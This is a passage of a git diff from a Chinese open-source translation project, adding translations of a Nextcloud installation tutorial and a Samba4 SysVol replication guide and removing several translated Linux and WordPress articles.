Nextcloud](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/4.png) -][13] +[![为 Nextcloud 生成一个自签名 SSL 证书](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/4.png)][13] -### Step 5 - Download and Install Nextcloud +### 步骤 5 - 下载和安装 Nextcloud -We will download Nextcloud with wget directly to the server, so we have to install wget first. Additionally, we need the unzip program. Install both applications with yum. +我直接使用 wget 命令下载 Nextcloud 到服务器上,因此需要先行安装 wget。此外,还需要安装 unzip 来进行解压。使用 'yum' 命令来安装这两个程序。 +``` yum -y install wget unzip +``` -Go to the /tmp directory and download latest stable Nextcloud 10 version from the Nextcloud web site with wget. +先进入 /tmp 目录,然后使用 wget 从官网下载最新的 Nextcloud 10。 +``` cd /tmp wget https://download.nextcloud.com/server/releases/nextcloud-10.0.2.zip +``` -Extract the nextcloud zip file and move it's content to the '/usr/share/nginx/html/' directory. +解压 Nextcloud,并将其移动到 '/usr/share/nginx/html/' 目录。 +``` unzip nextcloud-10.0.2.zip mv nextcloud/ /usr/share/nginx/html/ +``` -Next, go to the Nginx web root directory and create a new 'data' directory for Nextcloud. +下一步,转到 Nginx web 根目录为 Nextcloud 创建一个 'data' 文件夹。 +``` cd /usr/share/nginx/html/ mkdir -p nextcloud/data/ +``` -Change the owner of the 'nextcloud' directory to the 'nginx' user and group. +变更 'nextcloud' 目录的拥有者为 'nginx' 用户和组。 +``` chown nginx:nginx -R nextcloud/ +``` -### Step 6 - Configure Nextcloud Virtual Host in Nginx +### 步骤 6 - 在 Nginx 中为 Nextcloud 配置虚拟主机 -In step 5 we've downloaded the Nextcloud source code and configured it to run under the Nginx web server. But we still need to configure a virtual host for Nextcloud. Create a new virtual host configuration file 'nextcloud.conf' in the Nginx 'conf.d' directory. +在步骤 5 我们已经下载好了 Nextcloud 源码,并配置好了让它运行于 Nginx 服务器中,但我们还需要为它配置一个虚拟主机。在 Nginx 的 'conf.d' 目录下创建一个新的虚拟主机配置文件 'nextcloud.conf'。 +``` cd /etc/nginx/conf.d/ vim nextcloud.conf +``` -Paste the Nextcloud virtual host configuration below. +将以下内容粘贴到虚拟主机配置文件中: ``` upstream php-handler { @@ -322,27 +367,30 @@ server { } ``` -Save the file and exit vim. +保存文件并退出 vim。 -Now test the Nginx configuration to ensure that there are no error,s- Then restart the service. +下载测试以下该 Nginx 配置文件是否有错误,没有的话就可以重启服务了。 +``` nginx -t systemctl restart nginx +``` -[ - ![Nextcloud Virtual Host Nginx](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/5.png) -][14] +[![在 Nginx 中为 Nextcloud 配置虚拟主机](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/5.png)][14] -### Step 7 - Configure SELinux and FirewallD for Nextcloud +### 步骤 7 - 为 Nextcloud 配置 SELinux 和 FirewallD 规则 -In this tutorial, we will leave SELinux on in enforcing mode, so we need a new package SELinux management tools to configure SELinux for Nextcloud. +本教程中,我们将以强制模式运行 SELinux,因此需要一个 SELinux 管理工具来为 Nextcloud 配置 SELinux。 -Install the SELinux management tools with this command. +使用以下命令安装 SELinux 管理工具。 +``` yum -y install policycoreutils-python +``` -Then execute the commands below as root user to allow Nextcloud to run under SELinux. Remember to change the Nextcloud directory in case you use a different directory. +然后以 root 用户来运行一下命令,以便让 Nextcloud 运行于 SELinux 环境之下。如果你是用的其他名称的目录,记得将 'nextcloud' 替换掉哦。 +``` semanage fcontext -a -t httpd_sys_rw_content_t '/usr/share/nginx/html/nextcloud/data(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/usr/share/nginx/html/nextcloud/config(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/usr/share/nginx/html/nextcloud/apps(/.*)?' @@ -351,62 +399,67 @@ semanage fcontext -a -t httpd_sys_rw_content_t '/usr/share/nginx/html/nextcloud/ semanage fcontext -a -t httpd_sys_rw_content_t '/usr/share/nginx/html/nextcloud/.user.ini' restorecon -Rv '/usr/share/nginx/html/nextcloud/' +``` -Next, we will enable the firewalld service and open the HTTP and HTTPS ports for Nextcloud. +接下来,我们要启用 firewalld 服务,同时为 Nextcloud 开启 http 和 https 端口。 -Start firewalld and enable it to start at boot time. +启动 firewalld 并设置随系统启动。 +``` systemctl start firewalld systemctl enable firewalld +``` -Now open the HTTP and HTTPS ports with the firewall-cmd command, then reload the firewall. +现在使用 firewall-cmd 命令来开启command http 和 https 端口,然后重新加载 firewall。 +``` firewall-cmd --permanent --add-service=http firewall-cmd --permanent --add-service=https firewall-cmd --reload +``` -[ - ![Configure Firewalld for Nextcloud](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/6.png) -][15] +[![为 Nextcloud 配置 FirewallD 规则](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/6.png)][15] -All the server configuration is done. +至此,服务器配置完成 -### Step 8 - Nextcloud Installation Wizard +### 步骤 8 - Nextcloud 安装 -Open your web browser and type in your Nextcloud domain name, mine is: cloud.nextcloud.co. You will be redirected to the secure https connection. +打开你的 Web 浏览器,输入你为 Nextcloud 设置的域名,我这里设置为 cloud.nextcloud.co,然后会重定向到安全性更好的 https 连接。 -Type in your desired admin user name and password, and then type in your database credentials. Click '**Finish Setup**'. +设置你的管理员用户名和密码,然后输入数据验证信息,点击 '**完成安装 (Finish Setup)**'。 -[ - ![Nextcloud stup wizards on CentOS 7](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/7.png) -][16] +[![Nextcloud 安装](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/7.png)][16] -The Nextcloud Admin Dashboard (File Manager) appears. +Nextcloud 管理面板 (文件挂了) 大致如下: -[ - ![Nextcloud Admin Dashboard File Manager](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/8.png) -][17] +[![Nextcloud 管理面板](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/8.png)][17] -Nextcloud User Settings. +Nextcloud 用户设置: -[ - ![Nextcloud user settings](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/9.png) -][18] +[![Nextcloud 用户设置](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/9.png)][18] -Admin Settings. +管理设置 -[ - ![The Nextcloud admin area](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/10.png) -][19] +[![管理设置](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/10.png)][19] -Nextcloud has been installed with Nginx, PHP7-FPM, and MariaDB on a CentOS 7 Server. +至此,我们在 CentOS 7 服务器上通过使用 Nginx、PHP7-FPM、MariaDB 完成了 Nextcloud 的安装。 --------------------------------------------------------------------------------- +### 参考链接 + +- [https://docs.nextcloud.com/](https://docs.nextcloud.com/) + +------------------------------------ + +译者简介: + +[GHLandy](http://GHLandy.com) —— 划不完粉腮柳眉泣别离。 + +------------------------------------ via: https://www.howtoforge.com/tutorial/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/ 作者:[Muhammad Arul][a] -译者:[译者ID](https://github.com/译者ID) +译者:[GHLandy](https://github.com/GHLandy) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md b/translated/tech/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md deleted file mode 100644 index 433a6cf41d..0000000000 --- a/translated/tech/20170112 You Can Now Have a Single ISO Image with All the Essential Ubuntu 16.10 Flavors.md +++ /dev/null @@ -1,32 +0,0 @@ -你现在可以下载包含所有版本的 Ubuntu 16.10 的单独 ISO 镜像了 -====================================== - -Softpedia 被 Linux AIO 开发商 Željko Popivoda 通知可以下载 Linux AIO(All-in-One)Ubuntu 16.10 Live DVD 了,该 DVD 包含所有必需的 Ubuntu 16.10 版本。 - -如果你梦想有一个可以写在 USB 或 DVD 光盘上的单独 ISO 镜像,然后在需要时启动某个 Ubuntu Linux 操作系统(如 Ubuntu、Kubuntu、Xubuntu、Lubuntu 或者 Ubuntu MATE)时使用它,现在你可以用 Linux AIO Ubuntu 16.10。 - -[Linux AIO][1] 团队以开发这种完全免费的多发行版 ISO 镜像而闻名,而Linux AIO Ubuntu 16.10 有两个版本,分别用于64位和32位平台,里面有 Ubuntu 16.10、Kubuntu 16.10、Xubuntu 16.10、Lubuntu 16.10、Ubuntu MATE 16.10 和 Ubuntu GNOME 16.10。 - -这些都是未修改的官方发行版。Linux AIO 团队把它们都放在一个容易使用的容器中,例如,当你在客户那,你需要向他/她展示各种基于 Linux 的操作系统来选择,你就不必带来六个不同的 U 盘或 DVD 光盘。 - -包含了硬件和内存测试工具 - -两种 Linux AIO Ubuntu 16.10 都附带两个重要的实用程序,即HDT(硬件检测工具),查看目标计算机上是否与不同的 Ubuntu 16.10 完全兼容,还有 Memtest86+,一个非常流行的命令行工具,用于测试系统内存错误并验证其完整性。 - -[Linux AIO Ubuntu 16.10 现在可以通过我们的网站下载][2],但请记住,由于文件托管的 SourceForge 服务器的存储限制,镜像被分为两个 .7z 存档,你需要下载并解压缩以获取可用的 ISO。 - -我们曾经被许多读者问过 UEFI 是否支持 Linux AIO Live DVD,答案仍然是没有,但是团队正在努力在未来实现对 UEFI 的支持。还请查看最近发布的 Linux AIO Ubuntu Mixture 2017.01。 - --------------------------------------------------------------------------------- - -via: http://news.softpedia.com/news/you-can-now-have-a-single-iso-image-with-all-essential-ubuntu-16-10-flavors-exclusive-511788.shtml - -作者:[ Marius Nestor][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://news.softpedia.com/editors/browse/marius-nestor -[1]:http://linuxaio.net/ -[2]:http://linux.softpedia.com/get/Linux-Distributions/Ubuntu-AIO-DVD-103429.shtml diff --git a/translated/tech/20170113 Best Linux Distributions for New Users.md b/translated/tech/20170113 Best Linux Distributions for New Users.md deleted file mode 100644 index fb264a305c..0000000000 --- a/translated/tech/20170113 Best Linux Distributions for New Users.md +++ /dev/null @@ -1,119 +0,0 @@ -针对不同新手最好的 Linux 版本 -============================================================ - - ![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/distros-new-users.jpg?itok=Prp88H71) -Jack Wallen 在考虑对于来自不同环境的新手们来说哪种 Linux 版本是专门为他们设计的。[CC0][5]社区。 - -一个很古老的问题,哪种 Linux 版本更适合比简单的指出哪种 Linux 版本受欢迎更重要。为什么是这样? - - - -让我们设置一个情景:你有一位用户,最有可能地,他过去大多数时候都是在 Windows 或者 Mac 系统上工作,它们二者都是可供选择的。现在,你想要在很短的时间里直截了当的说明 Linux 系统的工作方式并突出它的强大性和灵活性。 - -但是,请记住,最重要的一个方面是他们必须能够 _get it_(得到它),即开箱即用。 - -这就是为什么我们经常需要花费时间来找出哪种版本是最适合新手的 -- 因为把新手们带入 Linux 系统是传播 Linux 并增加 Linux 用户的最好方式。 - -对于新手来说最好的版本是什么?这次,我将要花费一定时间来说明对于来自不同环境的用户哪种版本才是最适合的。你也可以查看我的列表:[2017 最好的 OS 版本][11] - -[ - ![Advertisement for Intro to Linux](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/introtolinux_1_800x200.jpg?itok=VV8GZold "Advertisement for Intro to Linux") -][12] - -### 从 Windows 7 到 Linux:ZorinOS - -当 Windows 8 发布以后,有一个理由让如此多的用户依然坚持使用 Windows 7, 那就是相似度。用户们已经在相同的桌面环境上工作了数十年,他们不想转移到 Windows 8 类似触摸屏的平台上。所以,你会去选择哪种版本呢?你首先必须要考虑的是桌面环境。为什么?因为这是你能够立刻吸引上这些 Windows 7 用户的地方。对于这个任务,还有什么版本会比 [ZorinOS][13] 更好呢? - -ZorinOS 就是专门设计为 Windows 和 Mac 系统的替代品的,所以需要走很长一段路来模仿 Windows 和 Mac 桌面的外观和感觉。事实上,除了 ZorinOS 以外,你很难找到一个别的 Linux 版本,能够完美的从 Windows 7 转移到 Linux 系统上,同时保留 Linux 系统如此强大、灵活的平台。 - - -除了桌面环境(图片 1)以外, ZorinOS 完全基于 Ubuntu 系统,所以在“外表”下面, ZorinOS 和 Ubuntu 一样的工作(所以基本不用去担心硬件不能够被检测到)。同时伴有已准备好的可用软件,你便有了针对来自 Windows 7 用户的最完美的 Linux 版本。 - -### [zorinos.jpg][6] - - ![ZorinOS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/zorinos.jpg?itok=i970f1Id "ZorinOS") - -图片 1:类 Windows 7 的 ZorinOS 桌面,准备开始服务。[使用许可][1] - -请注意:然而, ZorinOS 有两个版本: Zorin Ultimate 和 Zorin Core 。 Zorin Core 是免费的,但它不包含几乎所有你能够在 Zorin Ultimate 中找到的软件。如果你想要一个适合所有来自 Windows 7 用户的开箱即用的版本,那么我强烈推荐购买 [Zorin Ultimate][14](大约需要花费 20 美元)。当然,如果你不想花钱购买 Ultimate 版本,你也可以从 Core 版本包含的软件包管理工具中安装几乎所有你需要的东西。 - -[ - ![Advertisement for New Year's resolution to be a Linux sysadmin](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/newyearsresolution_1_800x200.jpg?itok=BeGasy1I "Advertisement for New Year's resolution to be a Linux sysadmin") -][15] - -### 从 Windows 8 到 Linux : Ubuntu GNOME - -转向 Windows 8, 它带来了一个以触摸屏为中心的环境,从而改变了用户与电脑互动的方式。老式的星菜单/面板/系统托盘桌面已经被触摸屏环境界面所取代。如果你正在找一个能给 Linux 新手们带来不同体验的最好环境,同时功能也要是最好的,那么没有比 [Ubuntu GNOME][16] 更合适的了。 - -Ubuntu GNOME 是 Ubuntu 和 GNOME(图 2)这两个世界之间最好的融合。 -用一个现代、优雅、简洁并且用户友好性的桌面代替了 Unity 界面, 因此 Ubuntu GNOME 不会给任何来自 Windows 8 的用户造成太多的麻烦。这个版本不仅基于 LFS 最新的 Ubuntu 发行版(支持将持续),同时使用了最新的 GNOME 桌面的稳定发行版 - 这意味着用户将能够享受到难以置信的稳定体验。 - -### [ubuntugnome.jpg][7] - - ![Ubuntu GNOME](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntugnome.jpg?itok=SNjA3y7T "Ubuntu GNOME") - -图片 2 :在 Ubuntu GNOME 中可以发现,在最大化保证优雅性的情况下提高简洁性。 [使用许可][2] - -### 从 Mac 到 Linux : Elementary OS - -毫无疑问,这一环节的绝对赢家是 [Elementary OS][17] 。尽管 Elementary OS 在外观和感觉上所达到的效果和 OS X 桌面非常相似,但实际还有更多优秀的地方。 Elementary OS 同样是基于 Linux 系统的,只不过是它采取了很多 Mac X 桌面的设计元素。 - -任何的 Mac 用户使用 Elementary OS 的桌面环境(图片 3)都会感觉就像是“在家一样”(使用 Mac 一样)。伴有如此熟悉的文档,同时包含一个熟悉的应用菜单, Elementary OS 总是位于我的‘最好的版本列表’的顶部。如果我们正在和 Mac 用户交谈,那么没有比 Elementary OS 更好的 Mac 替代品了。 - -### [elementaryos.jpg][8] - - ![Elementary OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.jpg?itok=qaXRClRM "Elementary OS") - -图片 3 :值得骄傲的 Elementary OS 桌面。[使用许可][3] - -有一件事情 Mac 用户们将会非常感激,那就是 Elementary OS 的开发者们很好的保持了桌面的一致性。从 dock, 到面板、菜单,包括应用,你找不到任何一个单一的应用看起来或感觉没有归属。 - -我将在这儿说一个关于 Elementary OS 的警告。你需要安装一个好的浏览器(因为它自带安装的 Epiphany-a 浏览器没有得到许多必要站点的支持),同时,你需要从官方的 [LibreOffice 网站][18]下载安装包安装 LibreOffice (因为在 Elementary OS 的软件中心找到的安装包已经有些过时了)。 - -### 从 Android 到 Linux:Ubuntu - -这似乎有点像是一个延伸,但考虑到 Android 在全球市场中占主导地位,所以你可能遇到一个来自以移动为中心的用户,他可能需要一个 Linux 桌面,从而让他一直感觉像是‘在家’一样。对于我来说, [Ubuntu][19] 是最清晰的赢家。为什么?和其他系统相比, Ubuntu Unity 在桌面上做出了很杰出的工作,它使得桌面感觉像是一个包罗万象的界面。如果你愿意,那么可以包含在线搜索结果(默认情况下禁用),这是在几乎每一移动环境中均可找到的东西。同样, Unity HUD 菜单系统(图片 4)是在任何界面中所能找到的最独一无二的菜单系统之一。伴随有 Unity HUD 菜单系统,用户可以更少的依赖鼠标(因为他们将在 Android 支持的移动设备上工作)。 - - -### [ubuntu.jpg][9] - - ![Ubuntu Unity](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu.jpg?itok=HsvBJAIN "Ubuntu Unity") - -图片 4: Unity 桌面显示运转中。[使用许可][4] - -当然, Ubuntu 也提供了市场上最稳定的桌面平台,所以用户体验近乎完美。 - -### 有一个适合每一个人的版本 - -有一件很重要的事情需要记住,那就是存在一个 Linux 版本适合每一个人。但是对于那些来自特殊环境的人,我强烈推荐找到一个最喜爱的 Linux 版本,从而能够帮助他们无缝过渡。给自己一个机会尝试一下,看一看在‘位于指尖’的开源和 Linux 的强大力量之下,你是否感到更加游刃有余。 - --------------------------------------------------------------------------------- - -via: https://www.linux.com/news/best-linux-distributions-new-users - -作者:[JACK WALLEN][a] -译者:[ucasFL](https://github.com/ucasFL) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/jlwallen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/licenses/category/used-permission -[5]:https://www.linux.com/licenses/category/creative-commons-zero -[6]:https://www.linux.com/files/images/zorinosjpg -[7]:https://www.linux.com/files/images/ubuntugnomejpg -[8]:https://www.linux.com/files/images/elementaryosjpg-1 -[9]:https://www.linux.com/files/images/ubuntujpg -[10]:https://www.linux.com/files/images/distros-new-usersjpg -[11]:https://www.linux.com/news/learn/sysadmin/best-linux-distributions-2017 -[12]:http://bit.ly/2jJgK0Q -[13]:https://zorinos.com/ -[14]:https://zorinos.com/download/#ultimate -[15]:https://training.linuxfoundation.org/certification/lfcs?utm_source=linux-inline-ad&utm_campaign=new-users-2017&utm_medium=online-advertising&utm_content=new-year -[16]:https://ubuntugnome.org/ -[17]:https://elementary.io/ -[18]:http://www.libreoffice.org/download/libreoffice-fresh/ -[19]:https://www.ubuntu.com/ diff --git a/translated/tech/20170116 5 Essential Tips for Securing Your WordPress Sites.md b/translated/tech/20170116 5 Essential Tips for Securing Your WordPress Sites.md deleted file mode 100644 index 6c27ef17cb..0000000000 --- a/translated/tech/20170116 5 Essential Tips for Securing Your WordPress Sites.md +++ /dev/null @@ -1,60 +0,0 @@ -5 个让你的 WordPress 站点安全的贴士 -============================================================ - - ![](https://www.rosehosting.com/blog/wp-content/uploads/2017/01/tips-for-securing-wp.jpg) - -WordPress 是迄今为止最流行的博客平台。 - -由于它的流行,它有它自己的优势和弱点。事实上,几乎每个人都使用它,使它更容易出现漏洞。因为新的缺陷被发现,WordPress 的开发人员正在不停地发布修复和补丁,但这并不意味着你可以简单地安装和忘记安装。 - -在这篇文章中,我们将提供一些最常见的保护和强化 WordPress 网站的方法。 - -### 在登录后台时总是使用 SSL - -不用说的是如果你并不只打算做一个随意的博客,你应该总是使用SSL。不使用加密连接登录到你的网站会暴露你的用户名和密码。目前任何人嗅探流量都可能会发现你的密码。如果你使用 WiFi 冲浪或者连接到一个公共热点,那么你会被黑客的机会更高,这是特别真实的。你可以从[这里][1]获取受信任的 SSL 证书。 - -### 对任何额外的插件挑剔 - -由第三方开发人员开发,每个插件的质量和安全性总是值得怀疑,并且它仅取决于其开发人员的经验。当安装任何额外的插件时,你应该仔细选择,并考虑其受欢迎程度以及插件的维护频率。应该避免维护不良的插件,因为它们更容易出现易于被利用的错误和漏洞。 - -此主题也是上一个关于 SSL 主题的补充,因为许多插件包含请求不安全(HTTP)连接的脚本。只要你的网站通过 HTTP 访问,一切似乎很好。但是,一旦你决定使用加密并强制使用 SSL 访问,则会立即导致网站损坏,因为当你使用 HTTPS 访问其他网站时,这些插件上的脚本将继续通过 HTTP 提供请求。 - -### 安装 Wordfence - -Wordfence 是由 Feedjit Inc. 开发的,Wordfence 是目前最流行的 WordPress 安全插件,并且是每个严肃的 WordPress 网站必备的,特别是那些使用[WooCommerce][2]或另一个 WordPress 电子商务平台的网站。 Wordfence 不只是一个插件,因为它提供了一系列的安全功能,它将加强您的网站。它具有 web 程序防火墙、恶意软件扫描程序、实时流量分析器和各种其他工具,它们可以提高你网站的安全性。防火墙将默认阻止恶意登录尝试,甚至可以配置为按照 IP 地址范围阻止整个国家/地区的访问。我们真正喜欢 Wordfence 的原因是,即使你的网站因为某些原因被危害,例如恶意脚本,Wordfence 可以在安装以后扫描和清理你的网站从被感染的文件。 - -公司提供插件的免费和付费订阅计划,但即使是免费计划,你的网站仍将获得令人满意的水平。 - -### 用额外的密码锁住 /wp-admin 和 /wp-login.php - -保护你的 WordPress 后端的另一个步骤是使用额外的密码保护任何除了你以外不打算让任何人使用的目录(读取URL)。 /wp-admin 目录已经在此关键目录列表中。 如果你不允许普通用户登录 WordPress,你应该使用其他密码限制 wp.login.php 文件。无论是使用 [Apache][3] 还是 [Nginx][4],你都可以访问这两篇文章,了解如何额外保护 WordPress 安装。 - -### 禁用/停止用户枚举 - -这是攻击者发现你网站上的有效用户名的一种相当简单的方法(阅读找出管理员用户名)。那么它是如何工作的?这很简单。在任何 WordPress 站点上的主要 URL 后面跟上 /?author=1 。 例如:wordpressexample.com/?author=1 - -要保护您的网站免受此影响,只需安装[停止用户枚举][5]插件。 - -### 禁用 XML-RPC - -RPC 代表远程过程调用,它可以用来从位于网络上另一台计算机上的程序请求服务的协议。在 WordPress 方面,XML-RPC 允许你使用流行的网络日志客户端(如Windows Live Writer)在你的 WordPress 博客上发布文章,但如果你使用 WordPress 移动应用程序那么也需要它。 XML-RPC 在早期版本中被禁用,但是从 WordPress 3.5 时它被默认启用,这让你的网站有更大的攻击面。虽然各种安全研究人员建议这不是一个大问题,如果你不打算使用网络博客客户端或 WP 移动应用程序,你应该禁用XML-RPC服务。 - -有多种方法可以做到这一点,最简单的是安装[禁用 XML-RPC][6]插件。 - --------------------------------------------------------------------------------- - -via: https://www.rosehosting.com/blog/5-tips-for-securing-your-wordpress-sites/ - -作者:[rosehosting.com][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:rosehosting.com -[1]:https://www.rosehosting.com/ssl-certificates.html -[2]:https://www.rosehosting.com/woocommerce-hosting.html -[3]:https://www.rosehosting.com/blog/password-protect-a-directory-using-htaccess/ -[4]:https://www.rosehosting.com/blog/password-protecting-directories-with-nginx/ -[5]:https://wordpress.org/plugins/stop-user-enumeration/ -[6]:https://wordpress.org/plugins/disable-xml-rpc/ diff --git a/translated/tech/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md b/translated/tech/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md deleted file mode 100644 index 67996f23f2..0000000000 --- a/translated/tech/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md +++ /dev/null @@ -1,49 +0,0 @@ -RISC-V - Linux 的微处理器 - 会开启一个开源硬件的文艺复兴么? -============================================================ - - - ![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/riscv2-1122x812.png) - -
- -我与许多人分享过一个希望,我们很快就能使用由开源硬件([OSH][1])_和_软件驱动的现代,强大的设备。 - -开放硬件有完整的文档,并且可以根据你的需求自由使用、研究、修改和复制。从原理图到 PCB 布局的所有内容都已发布,包括驱动硬件的软件。近年来有所进步,有更多的硬件被开放了,但是我们的 pc 和其他桌面或者智能手机/平板设备中的微处理器被限制在了以 x86 为主导的,封闭的指令集架构([ISA][2])或者 ARM 的 变体。这两个 ISA 都是闭源的并且不是开放设备的候选。此外,许多广泛使用的 ARM 实现像 A9 或 Snapdragon 添加了进一步的专有层到这些已经专有的 ISA 上。 - -[RISC-V][3]是不同的。在 UC Berkeley 的研究人员于 2010 年推出的 RISC-V(发音 risk-five)是根据同样的原始[RISC][4](精简指令集计算) CPU 设计构建的,其基础是其他熟悉的 ISA,如ARM、MIPS、PowerPC 和 SPARC,但目的是开放且不受专利保护(注意:目前,RISC-V 规范仅供私人或教育用途使用,并且计划在将来开放)。RISC 设计策略与 x86 系列的复杂指令集计算(CISC)设计相反。 - -虽然 RISC-V 不是现有唯一开放的 ISA,但它是唯一一个极速推进的。RISC-V 基金会指导 ISA 的开发和采用,它有一些相当大的捐赠者,如 Oracle、Western Digital、HP、Google、IBM 和 Nvidia。我可以想到几个名单上缺少的著名的芯片制造商。似乎大的玩家已经意识到,与软件一样,硬件会在开放下发展得更快更好。而且,任何人使用它你都不必支付。因为发展的困难和成本,一个像这样的项目并没有被更快地征服。现在,一个公开的结果是大公司正在跟进,开发资金正在源源而来。 - -RISC-V 在学术界也有很多支持。从在伯克利的孵化到在世界范围内超过 35 个大学项目协助其发展,在那里不缺乏聪明的头脑为这个项目工作。 - -背后也有进展。在软件方面,人们正在将程序移植到 RISC-V 上,并且可以让它启动起来。Fedora 已经移植了成千上万的程序 - 下面是 [Fedora/RISC-V][5] 在 QEMU 中启动: - - ![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/booting-500x664.gif) - -
_Hat tip to Richard WM Jones for this awesome gif._
- -在硬件方面,人们正在制造开发板。HiFive1 是一个成功众筹项目,是来自 SiFive 的一块 Arduino 板,由自己的 FE310 SoC 供电,这是一块 32 位的 RISC-V 芯片,运行频率为 320+ MHz。 它会在 2 月发货,你可以[在这里][6]预订一个,价格为 $59。 - - ![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/si5-640x457.jpg) - - - -这一切听起来很棒 - 我希望他们能够交付,因为我们都将从中受益非浅。如果可以,请支持这个项目。告诉人们这个东西。购买一块 HiFive1,看看它上面运行了什么。我在你的未来看到了这些芯片。 - --------------------------------------------------------------------------------- - -via: https://www.darrentoback.com/can-risc-v-linux-of-microprocessors-start-an-open-hardware-renaissance - -作者:[ dmt][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.darrentoback.com/about-me -[1]:https://en.wikipedia.org/wiki/Open-source_hardware -[2]:https://en.wikipedia.org/wiki/Comparison_of_instruction_set_architectures -[3]:https://en.wikipedia.org/wiki/RISC-V -[4]:https://en.wikipedia.org/wiki/Reduced_instruction_set_computing -[5]:https://fedoraproject.org/wiki/Architectures/RISC-V -[6]:https://www.crowdsupply.com/sifive/hifive1/ diff --git a/translated/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md b/translated/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md new file mode 100644 index 0000000000..2e4b94ee3e --- /dev/null +++ b/translated/tech/20170116 Setup SysVol Replication Across Two Samba4 AD DC with Rsync - Part 6.md @@ -0,0 +1,198 @@ +Setup SysVol Replication Across Two Samba4 AD DC with Rsync – Part 6 +============================================================ +使用 Rsync 命令来同步两个 Samba4 AD DC 之间的 SysVol 目录——(六) + +这篇文章讲的是在两个 Samba4 活动目录域控制器之间,通过一些强大的 Linux 工具来完成 SysVol 的复制操作,比如[Rsync 数据同步工具][2],[Cron 任务调度进程][3]和[SSH 协议][4]。 + +#### 要求:: + +1、 [将 Ubuntu 16.04 服务器作为域控制器加入到 Samba4 AD DC 环境中——(五)][1] + +### 第一步:配置 DC 服务器时间同步 + +1、在两个域控制器之间复制 sysvol 目录的内容之前,你得保证这两个服务器时间设置准确且一致。 + +如果这两个服务器的时间延迟大于 5 分钟,并且时钟也不同步,你将会遇到 AD 账号和域复制的各种问题。 + +为了解决多个域控制器之间时间漂移的问题,你需要在服务器上执行如下命令来[安装和配置 NTP 服务][5]。 + +``` +# apt-get install ntp +``` + +2、在 NTP 服务安装完成之后,打开主配置文件,把默认的 pool 值注释(在第一行 pool 参数前添加 # ),并且添加新的 pool 值指向已安装了 NTP 服务端的主 Samba4 AD DC FQDN ,如下所示。 + +``` +# nano /etc/ntp.conf +``` + +把下面几行添加到 ntp.conf 配置文件。 + +``` +pool 0.ubuntu.pool.ntp.org iburst +#pool 1.ubuntu.pool.ntp.org iburst +#pool 2.ubuntu.pool.ntp.org iburst +#pool 3.ubuntu.pool.ntp.org iburst +pool adc1.tecmint.lan +# Use Ubuntu's ntp server as a fallback. +pool ntp.ubuntu.com +``` +[ + ![Configure NTP for Samba4](http://www.tecmint.com/wp-content/uploads/2017/01/Configure-NTP-for-Samba4.png) +][6] + +Samba4 配置 NTP 服务 + +3、先不要关闭该文件,在文件末尾添加如下内容,这是为了让其它客户端能够查询并[与这个 NTP 服务器同步时间][7],并发出 NTP 签署请求,以防主 DC 离线: + +``` +restrict source 